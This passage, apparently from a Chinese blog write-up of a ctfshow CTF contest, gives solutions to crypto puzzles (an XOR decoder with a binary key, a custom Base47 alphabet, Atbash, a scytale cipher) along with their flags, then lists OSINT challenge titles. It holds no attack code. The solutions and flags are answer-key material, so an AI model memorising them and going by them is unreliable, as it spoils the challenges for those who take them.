    return 0;
}
'''
1001101100100001010001000010010
1011011001101010010011110010111
0111010000111101111001111010010
1010100011000111111010001000000
1101110011010100110101001100010
1110001101010011001010100111011
0111111000111011110000110111111
0001011110000110101110110101100
1000000110101101001101101010000
1101110011010010100100110110001
1010000011011110010010000010111
1011100001100011101011100101111
1011010111000011001010101000101
0001100001110100001100110101001
0001101101001011101101000111010
0010111111110000000101101110100
1100111000001000111001000111101
1101100001001100010100100000111
1010110011001010000000101101101
0110110010100110001011101000000
1011011110111010100001110111011
0001011100001111000001111000110
0100010110111000110010111101110
1010111101011110010011011111011
0100000010110001011101111111101
0101011101110011110000100011001
1111100111110110001000101001000
0111100101011111110100001101110
0101001001100001011011001110001
1110010100000101111010011010011
1000110001010011100100111101000
1111001101001111101010011001101
'''


str = "tthgYfobWGhnenk;WaxcZe7:b`x9ldgr"

key = []
with open("bitkey.txt") as f:
    for line in f:
        key.append((int(line,2)%11))

for i in range(len(str)):
    print(chr(ord(str[i])^key[i]),end="")
 '''
 suka_and_Migool1_are_g00dfr1ends
 '''

Base47

是神必还是神秘?

神必字符: E9CV^T+HT5#X36RF4@LAU703+F$E-0N$@68LMXCVDRJJD5@MP#7MUZDTE?WWLG1S#L@+^66H@59KTWYK8TW0RV

神必字典:0123456789ABCDEFGHJKLMNPQRSTUVWXYZ?!@#$%^&*-+

不是很懂

image-20221115150653950.png

@bash

密文如下: OLEVNFNFAR

flag格式为 ctfshow{明文}

埃特巴什码:

image-20221115151036546.png

This is Sparta

密文如下: WFlni~seseds~_lh ~@codyc~_owoot~Bm guf~oev rsTy ec ha!tgufon!oeplwj? t!a{i!Ca gy_@Tba oi}

code.txt: WFlni~seseds~_lh ~@codyc~_owoot~Bm guf~oev rsTy ec ha!tgufon!oeplwj? t!a{i!Ca gy_@Tba oi}

emmm,这两除了前面有啥不一样吗?
我去看着像栅栏,但是没弄出来
又看了一下题目:This is Sparta
后面是斯巴达,搜一下看到了斯巴达密码棒
解出了个这么玩意:

Wis ctfshow{yo_ijnaT~~~~~~Fs_@_Boy!!?!@iTC ot emoclelshow vegetab}a !puc god end your flag

然而实际上却是:

Welcome to CTFshow vegetable dog cup! and your flag is ctfshow{yo~~~~~~Tanji_is_@_Boy!!?!@}

最后问了g4师傅:给了我这个网站 栅栏密码转换器
emmm

image-20221115161703464.png

OSINT

网络迷踪系列:略
题目太多了,到这人已经麻了,不想写了

Fish And Turtles

碧海蓝天

我滴家乡

横空出世

J某的行踪1

J某的行踪2

J某的行踪3

J某的行踪4

J某的行踪5

J某的行踪6

J某的行踪7

J某的行踪8

J某的行踪9

零碎的记忆1

零碎的记忆2

J某的过往1

J某的过往2

标签: none

仅有一条评论